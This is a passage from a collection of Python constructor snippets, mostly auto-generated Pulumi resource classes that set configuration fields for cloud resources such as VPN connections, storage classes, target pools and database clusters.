\"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)", "def __init__(self, instance, created, signal_type):\n\n self.instance = instance\n self.created = created\n self.signal_type = signal_type", "def __init__(__self__, *,\n name: str,\n allow_volume_expansion: Optional[bool] = None,\n allowed_topologies: Optional[Sequence['outputs.CSIUnitySpecDriverStorageClassAllowedTopologies']] = None,\n default: Optional[bool] = None,\n parameters: Optional[Mapping[str, str]] = None,\n reclaim_policy: Optional[str] = None):\n pulumi.set(__self__, \"name\", name)\n if allow_volume_expansion is not None:\n pulumi.set(__self__, \"allow_volume_expansion\", allow_volume_expansion)\n if allowed_topologies is not None:\n pulumi.set(__self__, \"allowed_topologies\", allowed_topologies)\n if default is not None:\n pulumi.set(__self__, \"default\", default)\n if parameters is not None:\n pulumi.set(__self__, \"parameters\", parameters)\n if reclaim_policy is not None:\n pulumi.set(__self__, \"reclaim_policy\", reclaim_policy)", "def __init__(__self__, *,\n key: pulumi.Input[str],\n name: pulumi.Input[str],\n namespace: pulumi.Input[str]):\n pulumi.set(__self__, \"key\", key)\n pulumi.set(__self__, \"name\", name)\n pulumi.set(__self__, \"namespace\", namespace)", "def __init__(__self__, *,\n discovery_spec: pulumi.Input['ZoneDiscoverySpecArgs'],\n lake: pulumi.Input[str],\n location: pulumi.Input[str],\n resource_spec: pulumi.Input['ZoneResourceSpecArgs'],\n type: pulumi.Input[str],\n description: Optional[pulumi.Input[str]] = None,\n display_name: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"discovery_spec\", discovery_spec)\n pulumi.set(__self__, \"lake\", lake)\n pulumi.set(__self__, \"location\", location)\n pulumi.set(__self__, \"resource_spec\", resource_spec)\n pulumi.set(__self__, \"type\", type)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if display_name is not None:\n pulumi.set(__self__, \"display_name\", display_name)\n if labels is not None:\n pulumi.set(__self__, \"labels\", labels)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)", "def __init__(__self__, *,\n backup_pool: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n failover_ratio: Optional[pulumi.Input[float]] = None,\n health_checks: Optional[pulumi.Input[str]] = None,\n instances: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n self_link: Optional[pulumi.Input[str]] = None,\n session_affinity: Optional[pulumi.Input[str]] = None):\n if backup_pool is not None:\n pulumi.set(__self__, \"backup_pool\", backup_pool)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if failover_ratio is not None:\n pulumi.set(__self__, \"failover_ratio\", failover_ratio)\n if health_checks is not None:\n pulumi.set(__self__, \"health_checks\", health_checks)\n if instances is not None:\n pulumi.set(__self__, \"instances\", instances)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)\n if region is not None:\n pulumi.set(__self__, \"region\", region)\n if self_link is not None:\n pulumi.set(__self__, \"self_link\", self_link)\n if session_affinity is not None:\n pulumi.set(__self__, \"session_affinity\", session_affinity)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n approved_subscriptions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n instance_id: Optional[pulumi.Input[int]] = None,\n sleep: Optional[pulumi.Input[int]] = None,\n timeout: Optional[pulumi.Input[int]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n lab_name: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n user_name: pulumi.Input[str],\n arm_template_display_name: Optional[pulumi.Input[str]] = None,\n deployment_properties: Optional[pulumi.Input['EnvironmentDeploymentPropertiesArgs']] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"lab_name\", lab_name)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"user_name\", user_name)\n if arm_template_display_name is not None:\n pulumi.set(__self__, \"arm_template_display_name\", arm_template_display_name)\n if deployment_properties is not None:\n pulumi.set(__self__, \"deployment_properties\", deployment_properties)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)", "def __init__(__self__, *,\n name: str,\n allow_volume_expansion: Optional[bool] = None,\n allowed_topologies: Optional[Sequence['outputs.CSIVXFlexOSSpecDriverStorageClassAllowedTopologies']] = None,\n default: Optional[bool] = None,\n parameters: Optional[Mapping[str, str]] = None,\n reclaim_policy: Optional[str] = None):\n pulumi.set(__self__, \"name\", name)\n if allow_volume_expansion is not None:\n pulumi.set(__self__, \"allow_volume_expansion\", allow_volume_expansion)\n if allowed_topologies is not None:\n pulumi.set(__self__, \"allowed_topologies\", allowed_topologies)\n if default is not None:\n pulumi.set(__self__, \"default\", default)\n if parameters is not None:\n pulumi.set(__self__, \"parameters\", parameters)\n if reclaim_policy is not None:\n pulumi.set(__self__, \"reclaim_policy\", reclaim_policy)", "def __init__(__self__, *,\n spec: Optional[pulumi.Input['InstanceSpecArgs']] = None):\n if spec is not None:\n pulumi.set(__self__, \"spec\", spec)", "def __init__(__self__, *,\n type_name: Optional[pulumi.Input[str]] = None,\n type_version_arn: Optional[pulumi.Input[str]] = None,\n version_id: Optional[pulumi.Input[str]] = None):\n if type_name is not None:\n pulumi.set(__self__, \"type_name\", type_name)\n if type_version_arn is not None:\n pulumi.set(__self__, \"type_version_arn\", type_version_arn)\n if version_id is not None:\n pulumi.set(__self__, \"version_id\", version_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n type_name: Optional[pulumi.Input[str]] = None,\n type_version_arn: Optional[pulumi.Input[str]] = None,\n version_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n force: Optional[pulumi.Input[bool]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n state: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n backup_pool: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n failover_ratio: Optional[pulumi.Input[float]] = None,\n health_checks: Optional[pulumi.Input[str]] = None,\n instances: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n session_affinity: Optional[pulumi.Input[str]] = None):\n if backup_pool is not None:\n pulumi.set(__self__, \"backup_pool\", backup_pool)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if failover_ratio is not None:\n pulumi.set(__self__, \"failover_ratio\", failover_ratio)\n if health_checks is not None:\n pulumi.set(__self__, \"health_checks\", health_checks)\n if instances is not None:\n pulumi.set(__self__, \"instances\", instances)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)\n if region is not None:\n pulumi.set(__self__, \"region\", region)\n if session_affinity is not None:\n pulumi.set(__self__, \"session_affinity\", session_affinity)", "def __init__(__self__, *,\n name: str,\n allow_volume_expansion: Optional[bool] = None,\n allowed_topologies: Optional[Sequence['outputs.CSIIsilonSpecDriverStorageClassAllowedTopologies']] = None,\n default: Optional[bool] = None,\n parameters: Optional[Mapping[str, str]] = None,\n reclaim_policy: Optional[str] = None):\n pulumi.set(__self__, \"name\", name)\n if allow_volume_expansion is not None:\n pulumi.set(__self__, \"allow_volume_expansion\", allow_volume_expansion)\n if allowed_topologies is not None:\n pulumi.set(__self__, \"allowed_topologies\", allowed_topologies)\n if default is not None:\n pulumi.set(__self__, \"default\", default)\n if parameters is not None:\n pulumi.set(__self__, \"parameters\", parameters)\n if reclaim_policy is not None:\n pulumi.set(__self__, \"reclaim_policy\", reclaim_policy)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input[pulumi.InputType['VpnConnectionTunnel1LogOptionsArgs']]] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input[pulumi.InputType['VpnConnectionTunnel2LogOptionsArgs']]] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n file_shares: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FileShareConfigArgs']]]]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n kms_key_name: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkConfigArgs']]]]] = None,\n project: Optional[pulumi.Input[str]] = None,\n tier: Optional[pulumi.Input['InstanceTier']] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n license_count: Optional[pulumi.Input[int]] = None,\n license_count_hard_limit: Optional[pulumi.Input[bool]] = None,\n license_counting_type: Optional[pulumi.Input[str]] = None,\n license_rules: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n owner_account_id: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if license_count is not None:\n pulumi.set(__self__, \"license_count\", license_count)\n if license_count_hard_limit is not None:\n pulumi.set(__self__, \"license_count_hard_limit\", license_count_hard_limit)\n if license_counting_type is not None:\n pulumi.set(__self__, \"license_counting_type\", license_counting_type)\n if license_rules is not None:\n pulumi.set(__self__, \"license_rules\", license_rules)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if owner_account_id is not None:\n pulumi.set(__self__, \"owner_account_id\", owner_account_id)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)", "def __init__(__self__, *,\n control_node_id: pulumi.Input[str],\n display_name: pulumi.Input[str],\n probe_type: pulumi.Input[str],\n arp: Optional[pulumi.Input[bool]] = None,\n honeypot_bind_lists: Optional[pulumi.Input[Sequence[pulumi.Input['HoneypotProbeHoneypotBindListArgs']]]] = None,\n ping: Optional[pulumi.Input[bool]] = None,\n probe_version: Optional[pulumi.Input[str]] = None,\n proxy_ip: Optional[pulumi.Input[str]] = None,\n service_ip_lists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n uuid: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"control_node_id\", control_node_id)\n pulumi.set(__self__, \"display_name\", display_name)\n pulumi.set(__self__, \"probe_type\", probe_type)\n if arp is not None:\n pulumi.set(__self__, \"arp\", arp)\n if honeypot_bind_lists is not None:\n pulumi.set(__self__, \"honeypot_bind_lists\", honeypot_bind_lists)\n if ping is not None:\n pulumi.set(__self__, \"ping\", ping)\n if probe_version is not None:\n pulumi.set(__self__, \"probe_version\", probe_version)\n if proxy_ip is not None:\n pulumi.set(__self__, \"proxy_ip\", proxy_ip)\n if service_ip_lists is not None:\n pulumi.set(__self__, \"service_ip_lists\", service_ip_lists)\n if uuid is not None:\n pulumi.set(__self__, \"uuid\", uuid)\n if vpc_id is not None:\n pulumi.set(__self__, \"vpc_id\", vpc_id)", "def __init__(self,\r\n external_ids=None,\r\n harsh_accel_setting=None,\r\n name=None):\r\n\r\n # Initialize members of the class\r\n self.external_ids = external_ids\r\n self.harsh_accel_setting = harsh_accel_setting\r\n self.name = name", "def __init__(self, name, layer):\n self.name = name\n self.layer = layer\n self.kind = \"Abstract\"\n self.slot = None", "def __init__(__self__, *,\n auto_renew: Optional[pulumi.Input[bool]] = None,\n auto_renew_period: Optional[pulumi.Input[int]] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n data_center_name: Optional[pulumi.Input[str]] = None,\n disk_size: Optional[pulumi.Input[int]] = None,\n disk_type: Optional[pulumi.Input[str]] = None,\n enable_public: Optional[pulumi.Input[bool]] = None,\n instance_type: Optional[pulumi.Input[str]] = None,\n ip_white: Optional[pulumi.Input[str]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n major_version: Optional[pulumi.Input[str]] = None,\n node_count: Optional[pulumi.Input[int]] = None,\n password: Optional[pulumi.Input[str]] = None,\n pay_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[int]] = None,\n period_unit: Optional[pulumi.Input[str]] = None,\n public_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n status: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None):\n if auto_renew is not None:\n pulumi.set(__self__, \"auto_renew\", auto_renew)\n if auto_renew_period is not None:\n pulumi.set(__self__, \"auto_renew_period\", auto_renew_period)\n if cluster_name is not None:\n pulumi.set(__self__, \"cluster_name\", cluster_name)\n if data_center_name is not None:\n pulumi.set(__self__, \"data_center_name\", data_center_name)\n if disk_size is not None:\n pulumi.set(__self__, \"disk_size\", disk_size)\n if disk_type is not None:\n pulumi.set(__self__, \"disk_type\", disk_type)\n if enable_public is not None:\n pulumi.set(__self__, \"enable_public\", enable_public)\n if instance_type is not None:\n pulumi.set(__self__, \"instance_type\", instance_type)\n if ip_white is not None:\n pulumi.set(__self__, \"ip_white\", ip_white)\n if maintain_end_time is not None:\n pulumi.set(__self__, \"maintain_end_time\", maintain_end_time)\n if maintain_start_time is not None:\n pulumi.set(__self__, \"maintain_start_time\", maintain_start_time)\n if major_version is not None:\n pulumi.set(__self__, \"major_version\", major_version)\n if node_count is not None:\n pulumi.set(__self__, \"node_count\", node_count)\n if password is not None:\n pulumi.set(__self__, \"password\", password)\n if pay_type is not None:\n pulumi.set(__self__, \"pay_type\", pay_type)\n if period is not None:\n pulumi.set(__self__, \"period\", period)\n if period_unit is not None:\n pulumi.set(__self__, \"period_unit\", period_unit)\n if public_points is not None:\n pulumi.set(__self__, \"public_points\", public_points)\n if security_groups is not None:\n pulumi.set(__self__, \"security_groups\", security_groups)\n if status is not None:\n pulumi.set(__self__, \"status\", status)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if vswitch_id is not None:\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n enabled: Optional[pulumi.Input[bool]] = None,\n instance_id: Optional[pulumi.Input[int]] = None,\n message_type: Optional[pulumi.Input[str]] = None,\n queue_regex: Optional[pulumi.Input[str]] = None,\n recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n reminder_interval: Optional[pulumi.Input[int]] = None,\n time_threshold: Optional[pulumi.Input[int]] = None,\n type: Optional[pulumi.Input[str]] = None,\n value_calculation: Optional[pulumi.Input[str]] = None,\n value_threshold: Optional[pulumi.Input[int]] = None,\n vhost_regex: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n extended_location: pulumi.Input['ExtendedLocationArgs'],\n l3_isolation_domain_id: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n vlan: pulumi.Input[float],\n hybrid_aks_ipam_enabled: Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]] = None,\n hybrid_aks_plugin_type: Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]] = None,\n interface_name: Optional[pulumi.Input[str]] = None,\n ip_allocation_type: Optional[pulumi.Input[Union[str, 'IpAllocationType']]] = None,\n ipv4_connected_prefix: Optional[pulumi.Input[str]] = None,\n ipv6_connected_prefix: Optional[pulumi.Input[str]] = None,\n l3_network_name: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"extended_location\", extended_location)\n pulumi.set(__self__, \"l3_isolation_domain_id\", l3_isolation_domain_id)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"vlan\", vlan)\n if hybrid_aks_ipam_enabled is None:\n hybrid_aks_ipam_enabled = 'True'\n if hybrid_aks_ipam_enabled is not None:\n pulumi.set(__self__, \"hybrid_aks_ipam_enabled\", hybrid_aks_ipam_enabled)\n if hybrid_aks_plugin_type is None:\n hybrid_aks_plugin_type = 'SRIOV'\n if hybrid_aks_plugin_type is not None:\n pulumi.set(__self__, \"hybrid_aks_plugin_type\", hybrid_aks_plugin_type)\n if interface_name is not None:\n pulumi.set(__self__, \"interface_name\", interface_name)\n if ip_allocation_type is None:\n ip_allocation_type = 'DualStack'\n if ip_allocation_type is not None:\n pulumi.set(__self__, \"ip_allocation_type\", ip_allocation_type)\n if ipv4_connected_prefix is not None:\n pulumi.set(__self__, \"ipv4_connected_prefix\", ipv4_connected_prefix)\n if ipv6_connected_prefix is not None:\n pulumi.set(__self__, \"ipv6_connected_prefix\", ipv6_connected_prefix)\n if l3_network_name is not None:\n pulumi.set(__self__, \"l3_network_name\", l3_network_name)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n ipv6_gateway_name: Optional[pulumi.Input[str]] = None,\n resource_group_id: Optional[pulumi.Input[str]] = None,\n spec: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n container_registry_name: Optional[pulumi.Input[str]] = None,\n instance_count: Optional[pulumi.Input[int]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tier: Optional[pulumi.Input[str]] = None,\n virtual_network_subnet_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None,\n namespace: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if namespace is not None:\n pulumi.set(__self__, \"namespace\", namespace)", "def __init__(__self__, *,\n acl_name: pulumi.Input[str],\n node_type: pulumi.Input[str],\n auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,\n data_tiering: Optional[pulumi.Input[bool]] = None,\n description: Optional[pulumi.Input[str]] = None,\n engine_version: Optional[pulumi.Input[str]] = None,\n final_snapshot_name: Optional[pulumi.Input[str]] = None,\n kms_key_arn: Optional[pulumi.Input[str]] = None,\n maintenance_window: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n name_prefix: Optional[pulumi.Input[str]] = None,\n num_replicas_per_shard: Optional[pulumi.Input[int]] = None,\n num_shards: Optional[pulumi.Input[int]] = None,\n parameter_group_name: Optional[pulumi.Input[str]] = None,\n port: Optional[pulumi.Input[int]] = None,\n security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n snapshot_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n snapshot_name: Optional[pulumi.Input[str]] = None,\n snapshot_retention_limit: Optional[pulumi.Input[int]] = None,\n snapshot_window: Optional[pulumi.Input[str]] = None,\n sns_topic_arn: Optional[pulumi.Input[str]] = None,\n subnet_group_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tls_enabled: Optional[pulumi.Input[bool]] = None):\n pulumi.set(__self__, \"acl_name\", acl_name)\n pulumi.set(__self__, \"node_type\", node_type)\n if auto_minor_version_upgrade is not None:\n pulumi.set(__self__, \"auto_minor_version_upgrade\", auto_minor_version_upgrade)\n if data_tiering is not None:\n pulumi.set(__self__, \"data_tiering\", data_tiering)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if engine_version is not None:\n pulumi.set(__self__, \"engine_version\", engine_version)\n if final_snapshot_name is not None:\n pulumi.set(__self__, \"final_snapshot_name\", final_snapshot_name)\n if kms_key_arn is not None:\n pulumi.set(__self__, \"kms_key_arn\", kms_key_arn)\n if maintenance_window is not None:\n pulumi.set(__self__, \"maintenance_window\", maintenance_window)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if name_prefix is not None:\n pulumi.set(__self__, \"name_prefix\", name_prefix)\n if num_replicas_per_shard is not None:\n pulumi.set(__self__, \"num_replicas_per_shard\", num_replicas_per_shard)\n if num_shards is not None:\n pulumi.set(__self__, \"num_shards\", num_shards)\n if parameter_group_name is not None:\n pulumi.set(__self__, \"parameter_group_name\", parameter_group_name)\n if port is not None:\n pulumi.set(__self__, \"port\", port)\n if security_group_ids is not None:\n pulumi.set(__self__, \"security_group_ids\", security_group_ids)\n if snapshot_arns is not None:\n pulumi.set(__self__, \"snapshot_arns\", snapshot_arns)\n if snapshot_name is not None:\n pulumi.set(__self__, \"snapshot_name\", snapshot_name)\n if snapshot_retention_limit is not None:\n pulumi.set(__self__, \"snapshot_retention_limit\", snapshot_retention_limit)\n if snapshot_window is not None:\n pulumi.set(__self__, \"snapshot_window\", snapshot_window)\n if sns_topic_arn is not None:\n pulumi.set(__self__, \"sns_topic_arn\", sns_topic_arn)\n if subnet_group_name is not None:\n pulumi.set(__self__, \"subnet_group_name\", subnet_group_name)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tls_enabled is not None:\n pulumi.set(__self__, \"tls_enabled\", tls_enabled)", "def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n instance_id: Optional[pulumi.Input[int]] = None,\n message_type: Optional[pulumi.Input[str]] = None,\n queue_regex: Optional[pulumi.Input[str]] = None,\n recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n reminder_interval: Optional[pulumi.Input[int]] = None,\n time_threshold: Optional[pulumi.Input[int]] = None,\n type: Optional[pulumi.Input[str]] = None,\n value_calculation: Optional[pulumi.Input[str]] = None,\n value_threshold: Optional[pulumi.Input[int]] = None,\n vhost_regex: Optional[pulumi.Input[str]] = None):\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if instance_id is not None:\n pulumi.set(__self__, \"instance_id\", instance_id)\n if message_type is not None:\n pulumi.set(__self__, \"message_type\", message_type)\n if queue_regex is not None:\n pulumi.set(__self__, \"queue_regex\", queue_regex)\n if recipients is not None:\n pulumi.set(__self__, 